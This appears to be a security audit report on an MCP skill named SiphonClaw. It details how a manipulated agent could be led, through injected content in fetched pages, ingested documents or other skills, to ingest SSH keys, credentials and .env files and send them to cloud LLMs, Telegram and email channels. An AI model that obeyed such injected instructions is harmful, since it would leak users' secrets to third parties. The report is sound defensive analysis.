Is curtisgc1/siphonclaw safe?

The siphonclaw_ingest and siphonclaw_identify MCP tools accept arbitrary absolute filesystem paths with no documented access controls, path sandboxing, or allowlist. Any file readable by the agent process — including .env files, SSH private keys, AWS credentials, and API key files — can be ingested into the knowledge base. In Mode B (Full Cloud), file content is transmitted directly to OpenRouter, MiniMax M2.5, and Kimi K2.5 during ingestion. In Mode A (Hybrid), text excerpts from indexed files are transmitted to cloud LLMs at query time. This creates a direct, low-friction pathway from local sensitive files to third-party cloud providers.

The skill's core design — read arbitrary local files via absolute paths, process through external cloud LLMs, store in a queryable vector database, expose via Telegram/email/CLI — constitutes a functional end-to-end exfiltration system when an agent is manipulated into ingesting sensitive files. No prompt injection in SKILL.md is required; an attacker who can influence any content the agent encounters can direct siphonclaw_ingest calls. The architecture requires no modification to become a data collection tool.

The siphonclaw_field_note tool and the learning loop mechanism persistently index captured data with no expiry, making it permanently retrievable via subsequent queries. Telegram bot and AgentMail integrations provide external access to this knowledge base that is not under the user's direct control once API keys are configured. If an agent is manipulated into ingesting sensitive data in one session, that data persists and can be accessed externally in future sessions.

Beyond the primary OpenRouter/MiniMax/Kimi cloud APIs, the skill integrates three additional external communication channels: Telegram bot (queries and responses via Telegram's servers), AgentMail email pipeline (asynchronous query access via email), and Brave Search API (query terms transmitted on every web-search fallback). Each channel represents an additional endpoint to which data can flow and an additional credential that, if compromised, grants access to the knowledge base.

Although SKILL.md itself contains no prompt injection, the file_path and image_path parameters in siphonclaw_ingest and siphonclaw_identify are natural targets for second-order injection. A malicious document ingested into the knowledge base, a manipulated web search result, or another compromised skill could instruct the agent to call siphonclaw_ingest with a path to sensitive files — bypassing the need for direct prompt injection in SKILL.md.

The README setup instructions include 'curl -fsSL https://ollama.com/install.sh | sh', the well-known insecure pattern of fetching and executing a remote shell script without signature verification. While Ollama is a legitimate project, this pattern in setup docs normalizes unsafe practices and could be substituted by a malicious fork. This was not triggered during install monitoring but represents risk for users following the documented setup path.

When co-installed with any skill that fetches web pages or lists filesystem directories, SiphonClaw becomes a two-stage attack platform: stage one discovers sensitive file paths or receives attacker-controlled ingestion instructions via fetched content, stage two ingests those files via siphonclaw_ingest. The skill is designed to be composable with other MCP tools, which amplifies its risk in a multi-skill environment.

The name 'SiphonClaw' precisely describes covert data extraction: 'siphon' means to draw off or drain covertly, 'claw' means to seize or grab. While this could be legitimate branding for a document intelligence tool, the name combined with the architectural design of reading arbitrary local files and routing contents to external servers creates a pattern worth noting. Tool prefix 'siphonclaw_' appears in every MCP tool name.

The git sparse-checkout install produced only expected network connections to GitHub (140.82.121.3:443). No unexpected process spawning, no novel outbound connections, no filesystem changes outside the skill directory, and no canary file exfiltration occurred during the installation window. The skill files themselves (SKILL.md, README.md, _meta.json) are documentation only.

Sensitive file accesses visible in inotify and auditd logs (at timestamps 1771936331.303-304 and 1771936355.570) occurred before and after the git clone respectively, consistent with monitoring system pre-install baseline capture and post-install integrity verification. The git clone command was not issued until timestamp 1771936336.809. No skill-initiated process accessed the canary files.